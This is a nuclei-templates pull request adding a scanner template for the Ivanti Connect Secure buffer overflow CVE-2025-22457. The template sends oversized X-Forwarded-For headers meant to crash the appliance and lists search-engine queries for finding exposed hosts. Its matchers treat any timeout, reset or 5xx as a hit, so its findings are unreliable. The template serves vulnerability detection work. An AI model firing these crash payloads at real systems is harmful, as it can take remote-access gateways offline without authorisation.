### PR TITLE
Add CVE-2025-22457 - Ivanti - Buffer Overflow 

### DIFF
--- a/http/cves/2025/CVE-2025-22457.yaml
+++ b/http/cves/2025/CVE-2025-22457.yaml
@@ -21,7 +21,14 @@ info:
   metadata:
     vendor: ivanti
     product: connect_secure
-    shodan-query: 'http.title:"Ivanti Connect Secure" OR http.title:"Pulse Connect Secure"'
+    shodan-query:
+      - "html:\"welcome.cgi?p=logo\""
+      - http.title:"ivanti connect secure"
+      - http.html:"welcome.cgi?p=logo"
+    fofa-query:
+      - body="welcome.cgi?p=logo"
+      - title="ivanti connect secure"
+    google-query: intitle:"ivanti connect secure"
   tags: cve,cve2025,ivanti,rce,buffer-overflow,kev,critical
 
 http:
@@ -50,32 +57,24 @@ http:
     matchers-condition: or
     matchers:
       - type: dsl
-        name: "connection-reset-or-timeout"
+        name: "ivanti-crash-detection"
         dsl:
           - "status_code == 0"
           - "len(body) == 0"
         condition: and
 
       - type: dsl
-        name: "bad-gateway-response"
+        name: "ivanti-error-response"
         dsl:
-          - "status_code == 502"
-          - "contains(tolower(body), 'bad gateway') || contains(tolower(body), 'proxy error')"
+          - "status_code >= 500"
+          - "contains(tolower(header), 'ivanti') || contains(tolower(body), 'ivanti') || contains(tolower(body), 'dana')"
         condition: and
 
       - type: dsl
-        name: "internal-server-error"
+        name: "connection-reset-buffer-overflow"
         dsl:
-          - "status_code == 500"
-          - "contains(tolower(body), 'internal server error') || contains(tolower(body), 'server error')"
-        condition: and
-
-      - type: dsl
-        name: "service-unavailable"
-        dsl:
-          - "status_code == 503"
-          - "contains(tolower(body), 'service unavailable') || contains(tolower(body), 'temporarily unavailable')"
-        condition: and
+          - "contains(error, 'connection reset') || contains(error, 'timeout') || contains(error, 'broken pipe')"
+        condition: or
 
 # CVE-2025-22457 is triggered by an overly long X-Forwarded-For header (1024+ bytes)
 # The vulnerable code copies this header into a fixed-size stack buffer without bounds checking

--- a/http/cves/2025/CVE-2025-22457.yaml
+++ b/http/cves/2025/CVE-2025-22457.yaml
@@ -1,0 +1,82 @@
+id: CVE-2025-22457
+
+info:
+  name: Ivanti Connect Secure - Stack-based Buffer Overflow
+  author: nuclei-community
+  severity: critical
+  description: |
+    Ivanti Connect Secure versions prior to 22.7R2.6, Policy Secure versions prior to 22.7R1.4, and ZTA Gateways versions prior to 22.8R2.2 contain a stack-based buffer overflow vulnerability in the handling of the X-Forwarded-For HTTP header allowing unauthenticated remote code execution.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-22457
+    - https://www.rapid7.com/blog/post/2025/04/03/etr-ivanti-connect-secure-cve-2025-22457-exploited-in-the-wild/
+    - https://forums.ivanti.com/s/article/Security-Advisory-CVE-2025-22457-for-Ivanti-Connect-Secure-and-Policy-Secure
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-22457
+    cwe-id: CWE-121
+    epss-score: 0.97531
+    epss-percentile: 0.99996
+    cpe: cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: ivanti
+    product: connect_secure
+    shodan-query: 'http.title:"Ivanti Connect Secure" OR http.title:"Pulse Connect Secure"'
+  tags: cve,cve2025,ivanti,rce,buffer-overflow,kev,critical
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        X-Forwarded-For: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+      - |
+        GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        X-Forwarded-For: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+    unsafe: true
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        name: "connection-reset-or-timeout"
+        dsl:
+          - "status_code == 0"
+          - "len(body) == 0"
+        condition: and
+
+      - type: dsl
+        name: "bad-gateway-response"
+        dsl:
+          - "status_code == 502"
+          - "contains(tolower(body), 'bad gateway') || contains(tolower(body), 'proxy error')"
+        condition: and
+
+      - type: dsl
+        name: "internal-server-error"
+        dsl:
+          - "status_code == 500"
+          - "contains(tolower(body), 'internal server error') || contains(tolower(body), 'server error')"
+        condition: and
+
+      - type: dsl
+        name: "service-unavailable"
+        dsl:
+          - "status_code == 503"
+          - "contains(tolower(body), 'service unavailable') || contains(tolower(body), 'temporarily unavailable')"
+        condition: and
+
+# CVE-2025-22457 is triggered by an overly long X-Forwarded-For header (1024+ bytes)
+# The vulnerable code copies this header into a fixed-size stack buffer without bounds checking
+# Detection relies on observing server crashes, connection resets, or error responses


### PR DESCRIPTION
### Template / PR Information
- Added [CVE-2025-22457](https://github.com/advisories/GHSA-jjr5-fpcg-gc53) - Ivanti - Buffer Overflow

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

/claim #12969
```
╰─❯ nuclei -t http/cves/2025/CVE-2025-22457.yaml -u https://httpbin.org -debug                                              17:10:01 ✓


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Your current nuclei-templates  are outdated. Latest is v10.2.7
[INF] Successfully updated nuclei-templates (v10.2.7) to /home/codeman/nuclei-templates. GoodLuck!

Nuclei Templates v10.2.7 Changelog
┌───────┬───────┬──────────┬─────────┐
│ TOTAL │ ADDED │ MODIFIED │ REMOVED │
├───────┼───────┼──────────┼─────────┤
│ 11339 │ 11339 │ 0        │ 0       │
└───────┴───────┴──────────┴─────────┘
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-22457] Dumped HTTP request for https://httpbin.org/

GET / HTTP/1.1
Host: httpbin.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[INF] [CVE-2025-22457] Dumped HTTP request for https://httpbin.org/dana-na/auth/url_default/welcome.cgi

GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
Host: httpbin.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[WRN] [CVE-2025-22457] Could not execute request for https://httpbin.org: cause="ReadStatusLine: read tcp 192.168.173.7:54308->52.202.31.94:443: i/o timeout" chain="got err while executing"
[INF] Scan completed in 1m. No results found.

``` 
### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)